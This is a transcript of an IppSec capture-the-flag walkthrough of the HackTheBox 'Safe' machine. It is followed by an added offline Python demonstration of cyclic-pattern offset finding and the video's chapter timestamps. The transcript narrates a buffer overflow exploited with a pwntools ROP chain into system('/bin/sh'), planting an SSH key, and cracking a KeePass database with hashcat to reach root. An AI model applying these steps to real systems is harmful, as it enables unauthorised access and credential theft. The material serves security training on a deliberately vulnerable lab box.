HackTheBox - Safe
Key Takeaways
The video demonstrates a cybersecurity walkthrough of the HackTheBox 'Safe' challenge, utilizing tools like nmap, GDB, IDA Pro, and John the Ripper to exploit vulnerabilities and gain root access. The challenge involves exploiting a buffer overflow vulnerability, creating a ROP chain, and cracking passwords using John the Ripper and hashcat.
Full Transcript
What's going on YouTube, this is IppSec and we are going to be doing Safe from HackTheBox, which was labeled as an easy box. I think this one's medium, because the initial foothold to get on the box is exploiting the program via a ROP chain. It is a basic ROP chain, but nonetheless it is binary exploitation, a topic that many people struggle with. Once you get on the box there is a KeePass file along with a few images. You have to use either john2keepass or keepass2john along with the KeePass file and image to create hashes for it, and then you can either use John to crack it or hashcat. If you use hashcat there is a bug, I believe, where you can only crack one hash at a time, so you just gotta run hashcat multiple times. So let's just get into the box and we can see what's going on.

As always we start off with nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it safe, and then the IP address, which is 10.10.10.147. It can take some time to run, so I've already run it. Looking at the results we have just two ports open, the first one being SSH on port 22, and its banner is telling us that it's a Debian box. We also have HTTP on port 80, and its banner is telling us it's Debian as well and that it's an Apache httpd server. We had a few nmap scripts that ran, the important one being http-title, and that's just showing us that it's the default Apache web page. So we can validate this by just going to 10.10.10.147, and we see, yes, this is the Apache "It works" page. I'm just gonna quickly go to like robots.txt to see if I see anything there. Nothing. So let's go throw this over into dirbuster, so gobuster -u for URL... actually before that, specify dir mode, then -u for URL, and then the wordlist with -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium, and then -o for the output file; we'll just call this root-directory, and then let that run. While this goes there's really not much to do, so I'm going to also do a full port scan with nmap, nmap -p-. I'm also gonna specify the -v flag for verbose, and that's just gonna show us open ports as it does find them, and then the IP, which is 10.10.10.147.

While that goes, I guess we can go and look at this page. If you do a Ctrl+U to view the source you can see there is indeed something hidden about this page: there's a comment that says "my app can be downloaded to analyze from here, it is running on port 1337". So if we let nmap go it will eventually find port 1337, but we can just hit this on our own. So 10.10.10.147 port 1337, and we just get "what do you want me to echo back?" and it says "GET / HTTP/1.1". So this is kind of an indicator that we probably should use netcat or telnet, because we're making HTTP requests; this is the very first thing our browser sends. So if we open up a new pane and nc 10.10.10.147 port 1337... and let's do ncat, maybe that will be better. Oh, ncat's not installed; apt install ncat, I thought that was always installed. Let's see, it's just weird how nc was handling this line break. If we do nc 10.10.10.147 1337 we're just getting that; we put some stuff here and that outputs this text. I'm just curious if ncat is going to handle this any differently and print this text, letting us type here: ncat 10.10.10.147 1337. Nope, same behavior. So I wonder if that's just the way the program's coded, but we put some text here, it's gonna say "what do you want me to echo back" and then output the text, and we can't do it multiple times. So what I'm going to do is, let's say I go back, $(whoami), looking for command injection; it echoes that back fine. Let's do backtick whoami backtick; does that fine. So at this point let's go download the app. It says the app can be downloaded to analyze from here, so if we just click myapp to download this and then save the file, we can go over in terminal and move it out of Downloads, so mv Downloads/myapp . (a period for the current working directory), and then let's open up Ghidra to analyze this app.

We could also just execute it and see what happens, but I always like opening it up in some type of reverse engineering tool first. So New Project, Non-Shared, root HTB Safe, make the Ghidra project name, this will be myapp, Finish, open this, then let's fix the size a little bit, there we go. Import the file myapp, OK, analyze it, select all, analyze. I probably don't need to select all, but I'm just lazy and it's a small app, so I'd rather do everything than nothing. So let's go over into the functions and then we can go into main to see what this does. Looking at this decompiled thing, I wonder if I can make this bigger: properties, display, C style, font, here we go, 16, there we go, so that's probably easier to read. So we can see the main function: we have a variable right here assigning 112 bytes, and then it's executing system and passing it /usr/bin/uptime as that call. So this is why when we do an nc on this port it runs this; on our box, if we run uptime we get the same exact thing. So it runs uptime via a system call, then it does a gets, and then it puts. So just analyzing this I know that this is going to be vulnerable to a buffer overflow, but we can test it first. Because we're only assigning a hundred and twelve bytes here, and gets is just a vulnerable function, if we put in more than one hundred twelve bytes then we'll start overflowing the buffer and then getting an overwrite. So if you wanted to test this on your own, the standard way to do it is just first make this executable and then run gdb myapp. I have GEF installed; if you don't have that, go to, I think, the last video I did, Ellingson, and I go over installing this. But if we just put a bunch of A's... actually let's be scientific, we can do python -c 'print "A"*112', and then we can put this in and we see it exits normally. If we put A times 113, or do 114, it'll probably exit normally because we haven't overwritten enough to actually cause damage to the program, and we exit normally. Let's do A times 128 and then copy this, run, and now you can see what the segfault looks like.

So let's see exactly where we crash in this program. We see we're on a return instruction, and return is going to go to RSP, so looking at the RSP register we see just all A's. So in order to see where we actually returned we need to put some type of pattern in this buffer so we can see exactly where in the string it is. So I'm going to run pattern create 128... let's just do 200, no real reason, but keep it even. So now when we run this we can paste it, and then if I look at registers we can see RSP is here. If you want to take shortcuts you can just do pattern search $rsp; it handles these variables just fine, and we can see at offset 120 it found it in little endian format, and at offset 113 it found it in big endian. It says little endian is likely, so let's test that one first. So what we're gonna do is A times 120 plus B times 8, and then we can do plus C times 8 as well. You don't have to do the C thing, but it's nice to see where stuff goes in afterwards sometimes, so that's why I do that. So now when we run this program again we can see we still segfaulted, but if I run registers and we look at RSP we can see the B's and then the C's. So if we put a memory address here then we can continue through execution of the program. So, I didn't mean to exit; let's put the memory address of main. So looking at main, that's gonna be at 0x40115f. So let's do vi exploit.py and 0x40115f, and this will be main. I'm just putting that note there because we have to create the pwntools skeleton: from pwn import *, context.terminal = tmux new-window, and then p = process... is equal to gdb.debug('./myapp', 'b main'), and then context.os = 'linux', context.arch = 'amd64'. Okay, so now if we do junk = "A"*120 and then we put main on the stack, so we'll do call_main, I guess, = p64(0x40115f), and then p. ... we have to do like recvlines and print... oh, we can just try p.sendline(junk + call_main), and this has to be encoded; if I don't, it's in string format and call_main is in byte format, so doing this .encode() turns this from a string into bytes, so we can now concatenate. Run the file, python3 exploit.py, and we hit, because we're breaking on main, so I can just do continue, and "command aborted", see. So I'm guessing I have to do a recvline call until we get this, so let's copy this variable, go back into our code, the exploit, and have it do a recvuntil and then that line. So now when we run the exploit, if we do python3 exploit.py, we hit our first breakpoint, which is main; we do continue and we get hit by another breakpoint on main. So we have verified that a buffer overflow is working.

So what we want to do now is look at what we can do. Going into Ghidra, we want to hijack this system call; however, we don't have a way to put something on the stack. So if we look at this... where is it, crap, did not mean to click that... where is that system call? Right here, 0x401160. So if we go back into our script, 0x40116e, I think I said this will be system; I don't know why I actually did that. Let's just execute this and then break at 0x40116e, and it's correct, and then continue will immediately hit a breakpoint. But it should have been at the call, b *0x401164... 0x16e, continue, si... I don't think this is it. Oh yeah, it is. So right here's the system call. So what we're probably doing right here is loading the first variable into RDI, because this is load effective address, and in 64-bit land variables are passed as registers, and the order is RDI, RSI, RDX, RCX, R8 and R9. So since system is only taking one argument, which is /usr/bin/uptime, only one argument is going to get loaded; so that's why we have it loading into RDI right here. So if we do x... whoops, I'm still in tmux mode, there we go, x/s $rdi; we can't access anything. Let's go to what it can access. So right here is what we're loading in; so after this we should have a variable in RDI, and if we do registers we can see RDI is just 0x1. So do one more step and then we do x/s $rdi, and we can see we loaded a string, /usr/bin/uptime, and if we do registers we can see that RDI is set to the memory address of where this string is.

So all we have to do to exploit this now is try to find a way to put our string inside of RDI. And if you look through this app we can look at all the other exported functions. So this is main; what's pink, I believe, is exported; what is blue is imported, and imported just means it's coming from libc. So blue means it's not within this binary itself, it's a linked function. There is a function called test, and we can't even decompile test; I don't even know what the source code of this would look like. But looking at the assembly... let's see, can I change this easily? Registers, come on, font size, colors, properties, no props there, so I don't know how to change the size on this, my bad. Anyways, the first two things here are just setting up the stack upon being in a function: we push the base pointer to the stack and then copy RSP, the stack pointer, into the base pointer. This is just things to set it up; you can look down here as well into a different function and you see those same two commands. So this code actually begins right here: we're taking the stack pointer and putting it into RDI, and then jumping to whatever is in R13. So the stack pointer generally will contain the output of what things are called, because that's going to point to the very top of the stack. So when we go to main, let's go here... wait, main, okay, right here, when we do this puts, the stack... not stack, the RSP value will most likely be whatever we put in here. So this gets this local_78; we can hit L here and then change this to be RSP. We'll put "most likely RSP"; it's generally not how you name a variable, but that's what we're doing. So this is going to be a pointer to what is going to be in RSP, and if we do a ROP chain to test, to get into this function like we had done to get into main, then we will push RSP into RDI and then do a jump to R13. So R13 we want to be system.

So if we go back into terminal we can do ropper --search "pop r13"; may need to put this in quotes, there we go. So we can see we have a pop r13 here; it's going to do two other pops, so we'll just put null values in these two and then do a return. So we want to copy this address, and then here we can just exit, and then let's go back into exploit and add the memory value before you lose it on the clipboard, and this is going to be pop_r13, pop, pop. I don't care about the other pops, so that's why I just did that. Now we have to build the ROP chain. So the very first thing we have to do is put the string /bin/sh on the stack, so we'll do a variable called bin_sh = "/bin/sh\x00", a null byte which is going to terminate the string, and then convert this into byte format. This is going to be 8 characters: 1 2 3 4 5 6 7, and then this is all one. So we want to adjust junk to be 112; 120 minus 8 is equal to 112. So now that that's going to be there, we also have to call system, so this will be... whoopsie, no, this will be, yeah, system_plt, system, probably procedure linkage table. If we go to Ghidra, then go to main, where it's calling system, most likely right here, system, 0x401160... so 0x40116e... that doesn't look right. Let's see, we can exit this; let's just do objdump -D myapp, crap, | grep -i system. Okay, so this is the one we want, 0x401040. I guess we can try 0x401160, let's see if that works; that's gonna be system, it'll probably work. Change to 0x401040, okay, and this should be p64, that stands for pack 64-bit. So we'll also need to do the pop rdi function to get something into system, so pop_rdi = p64(0x401206), and then we need null = p64(0), and the final piece is the memory address of test, so we can jump to it, which will call system. So if we grab this address, that is going to be at 0x401152, so put that there.

And now we can begin assembling a ROP chain. I'm just gonna get rid of that call_main because we don't need it; it was actually just demonstrating things. So junk + bin_sh: this is going to have the string /bin/sh on... registered as the RSP variable, and now we're at 120 characters, so this is the first memory address overwriting into RSP. So we're going to put this as pop... it's not right to be pop_rdi, this is actually pop_r13 I think, 0x401206, 0x401206, yeah, so this is the pop r13 address. So later it's used as jmp r13; treat as RSP, I don't know a good way to explain that off the top of my head, but there's that. And this we can say: this is RSP, and RDI, then jmp r13. So RSP to RDI, jmp r13. Okay, so we want to pop r13, and that's going to take the top value, which is going to be the memory address of system, and it also does two other pops, so we want to do null, null, and then we want it to return to test. So I think that's right. So what this is going to do is it's going to put /bin/sh into RSP, then it's going to put the system variable, or the system memory location, into R13, and then it's going to get through the other two pops in that chain and then return to test, and test will now execute it, hopefully. So if we did everything correctly... there's our work, which we probably did. So this is break on main, continue, and, okay, main again, recvuntil this, p.interactive(), run, continue; it may not be going interactive because it's doing some weird forking. So let's just try it on the live system. So let's try p = remote('10.10.10.147', 1337), and it was on port 1337. So let's run this: opening connection, and we didn't get anything. Let's see, it's going over the network, remove that. Okay, remember that weird netcat issue I was having before, when we did like nc 10.10.10.147 1337 and it's not giving me that string? I think that's what's happening there, so that's why I removed that one line. If we just execute the program we get "what do you want me to echo back" right away, so that is why I had removed this recvuntil, because I was thinking maybe it just never got it, and it works. Awesome.

So we do this, do hostname, we are on safe. So the one thing I want to test out real quick is whether either of these system addresses work; I'm guessing they should. So instead of 0x40116e, which was down here, we'll do 0x401040 for system, run this again, and it still works. So again, all you have to do is get to system. So now that we're on the box we can do cd $HOME... can't, let's go, whoami, my bad, just run whoami, go into cd /home/user... actually it's going at home; see who's on this box, if there's anyone else. Just user. So go into user, and since I'm in a weird interactive mode I'm trying to get into .ssh so I can drop an SSH key in. Again, when I'm in this weird shell inside of pwntools I don't know a good way to get a full tty, so I'm now just dropping an SSH key: ssh-keygen -f, a file, we'll call it safe, and then chmod 600 safe.pub and we will just echo this into authorized_keys, chmod 600 the safe file, this is the private key. So ssh -i safe user@10.10.10.147 and we get a proper shell. So I can exit this and we can figure out what we want to do with this box. I see a bunch of JPEGs and a .kdbx, which is I believe a KeePass database. So let's just grab everything and then exit out of the shell, mkdir files, cd files, and we'll do scp -i ../safe, this is the private key, user@10.10.10.147, and we want to copy everything to a local directory. Now that the file copy is done let's just take a look at what these images look like. So I do nautilus . just so I get a file browser, and we can see the images look pretty standard. We can check exiftool to see if there's information in these, and glancing through this it looks like all the standard metadata associated with an image, so nothing too interesting there. We can also then binwalk the images, but I'll just do one because I don't think it'll result in anything interesting. Nope, they're just standard JPEGs.

There is that KeePass database, MyPasswords.kdbx, so my thought was we have to crack this. So I'm gonna do, was it keepass2john? locate 2john, locate john2... oh no, here it is, keepass2john, this is what the file is. So I'm gonna run this on MyPasswords.kdbx, and let's do two potential... we'll do keepass.hashes, so that's one. And then KeePass also has the thing where you can do key files, so if we do keepass2john you can do -k to specify the key file. So what I'm actually going to do is go through all the JPEGs and put them as key files: for i in *.jpeg; do echo $i; done. So all that's gonna do is get all the filenames, so keepass2john -k $i to do the filename, and then MyPasswords.kdbx, and hit enter, and we get a list of hashes. Now the one thing I want to do is replace MyPasswords with the filename of the key, because the hash is only this piece, but if we just did all this it can be a bit of a pain if we don't track the username of the hash, the username being the key file. So I'm going to do sed "s/MyPasswords/$i/g", and now we see MyPasswords has been replaced with the key file name. So we can just do >> keepass.hashes, so now when we take a look at this file we have a list of hashes. So we'll scp keepass.hashes to the Kraken; I'm just putting it in the hashcat/hashes directory, and the Kraken is just a machine I have dedicated to cracking. You can do it on your host computer, just don't do it in a VM, because VMs are slow. So we want to do ./hashcat --example-hashes and grep... do we have keepass? It's gonna be some weird casing; is it 13400? There we go... so I didn't find one, I didn't... oh, I suppose I'd do keepass with a y, that's why. But right here we have 13400, it's gonna be KeePass, and this is what it expects of the hash. If you do the --user flag you can put something before the hash and a colon to keep track of it, so super handy feature. ./hashcat -m 13400 -o hashes/... I don't even know what I called this, probably keepass.hashes, there we go, and then the wordlist, which will be /opt/wordlists/rockyou.txt, and we need the --user flag because we have stuff before the colon. So this is gonna start the crack.

There's one weird thing with KeePass and hashcat right now; I don't know if it's a bug on my end or just a bug in general, and it only will crack one at a time. I noticed this when I went through the whole list and it only said recovered 0/1; this should be 0/like 5 or 6, however many other lines we have in the hashes. So it's only taking the very first line, which is going to be whatever ends in ce7896; I think that's just KeePass with no key file. So you'd have to run through this cracking multiple times because hashcat wasn't picking them all up. Whoops, wrong file, this is keepass.hashes... nothing, okay, spotted correctly, so I don't think I remember... so ce7896 is this one, so it's only taking the very first one. So let's put this at the top, because I think it was 0547, just doing a little bit of cheating, but I would go through each of these, let hashcat run, and we'll see if this works. Oh, recovered one, so we can see the password is what I think of this challenge. If you do --user now... oh, not --user, --show, you can see it's keeping track of the key file. So we'll copy what I think of it, go back here, and we can do apt install kpcli; this is gonna be the KeePass CLI and this will let us go into the database. Maybe I have KeePass installed, which I don't think I do; no, I do not, or we'd just be able to use the GUI. Well, let that install and then use it. Finally done updating or installing kpcli, so I can do kpcli -h, so we can do kpcli --kdb; my kdb is going to be in the files directory, kpcli --kdb files/MyPasswords.kdbx --key, this is image 0547, does that not have image 0547, there we go. And then add a master password, type it, and then do help and we can see what commands we have. So this is just a literal like command line system: we do ls, we can go into MyPasswords, ls, there is the root, so we can show and then the entry number, which is going to be 0, root password, and then the password is in highlight. So we can probably do, let's see, show -a... it's not going to explain what those do, but there we go, nope, that's all, so what is the other one, show -f, there we go, -f will unhide it. So what we can do is now ssh root@10.10.10.147, put in the password, and it doesn't let us in, but SSH may be configured to not allow root login; SSH is often configured that way. So let's just ssh back in with the private key, user@10.10.10.147, and we can try a su to switch user, put in the root password, and we are here. So we can do wc -c root.txt and we see 33 characters, which is an md5sum and a line break. So that is the box. Hope you guys enjoyed, take care, and I'll see you all next week.
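As an added example (not IppSec's code and not taken from the video), here is the cyclic-pattern technique behind GEF's pattern create / pattern search in plain Python, with a constructed stand-in for the crashed process so it runs offline. The 112-byte buffer, the 120-byte return offset, the 200-byte pattern and the main address 0x40115f are the values from the walkthrough; `simulate_crash_rsp` is an assumption that models what the debugger showed in RSP.

```python
"""
De Bruijn crash-offset search, the idea behind GEF's `pattern create` and
`pattern search $rsp`.

Constructed scenario: myapp reads into a 112-byte buffer with gets(), the
saved return address sits 120 bytes into the input, and the crash leaves
pattern bytes in RSP. Nothing here touches a real process.
"""
from string import ascii_lowercase


def de_bruijn(alphabet: str, n: int, length: int) -> bytes:
    """First `length` bytes of the de Bruijn sequence B(k, n) over `alphabet`
    (FKM algorithm, the same construction GEF and pwntools use). Every window
    of n consecutive bytes is unique, so one register value pins down exactly
    one offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if len(out) >= length:          # enough output, prune the search
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length]).encode()


def pattern_create(length: int, cycle: int = 8) -> bytes:
    """GEF-style pattern: lowercase letters, window = pointer width (8 on amd64)."""
    return de_bruijn(ascii_lowercase, cycle, length)


def pattern_search(pattern: bytes, reg_value: int, width: int = 8) -> dict:
    """Mimic `pattern search $rsp`: try both byte orders of the register value
    and report where each lands in the pattern (-1 when absent)."""
    return {
        "little": pattern.find(reg_value.to_bytes(width, "little")),
        "big": pattern.find(reg_value.to_bytes(width, "big")),
    }


def simulate_crash_rsp(payload: bytes, ret_offset: int = 120, width: int = 8) -> int:
    """Assumed stand-in for the debugger: the `width` payload bytes at
    `ret_offset` land in the saved-return slot, which is what RSP points at
    when `ret` faults. Returns that slot as the little-endian qword that
    `registers` would display."""
    slot = payload[ret_offset:ret_offset + width]
    if len(slot) < width:
        raise ValueError("payload too short to reach the return address")
    return int.from_bytes(slot, "little")


def build_controlled_payload(offset: int, ret_addr: int) -> bytes:
    """Once the offset is known: junk up to the return slot, then the address
    to land on (the video's 'A'*120 + p64(main) sanity check)."""
    return b"A" * offset + ret_addr.to_bytes(8, "little")


if __name__ == "__main__":
    pat = pattern_create(200)
    rsp = simulate_crash_rsp(pat)
    print(f"RSP = {rsp:#018x}")
    print("offsets:", pattern_search(pat, rsp))   # little 120, big 113, as in the video
    check = build_controlled_payload(120, 0x40115F)
    print("controlled RSP:", hex(simulate_crash_rsp(check)))
```

The big-endian hit at 113 is not noise: with this pattern the seven "a" bytes before the letter at offset 120 form the reversed window, which is why GEF reports both and flags little endian as the likely one.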
Original Description
00:40 - Begin of nmap
02:31 - Discovering MyApp in the HTML Source
03:30 - Examining MyApp on port 1337
05:30 - Opening myapp up in Ghidra
07:20 - Testing out the buffer overflow
08:40 - Using pattern search to see where we can overwrite RSP
10:15 - Create a PwnTool Skeleton and having it call main instead of crashing
12:30 - Testing calling main (error: need to do recvline to send text)
13:50 - Explaining hijacking the SYSTEM() call
17:11 - Finding a way to put user input into RDI
17:30 - Examining the Test Function which places RSP to RDI
19:50 - Finding a pop r13 as the Test Function jumps to r13
23:30 - Putting the gadget together for code execution
27:00 - Setting pwntools to exploit the remote host
28:30 - Shell on the box
29:15 - Dropping SSH Key to get a normal shell and copying keepass files
31:40 - Using keepass2john to create hashes to crack
35:00 - Cracking keepass hashes with hashcat
37:50 - Using kpcli to export the root password
39:20 - Using the root password to su to the root user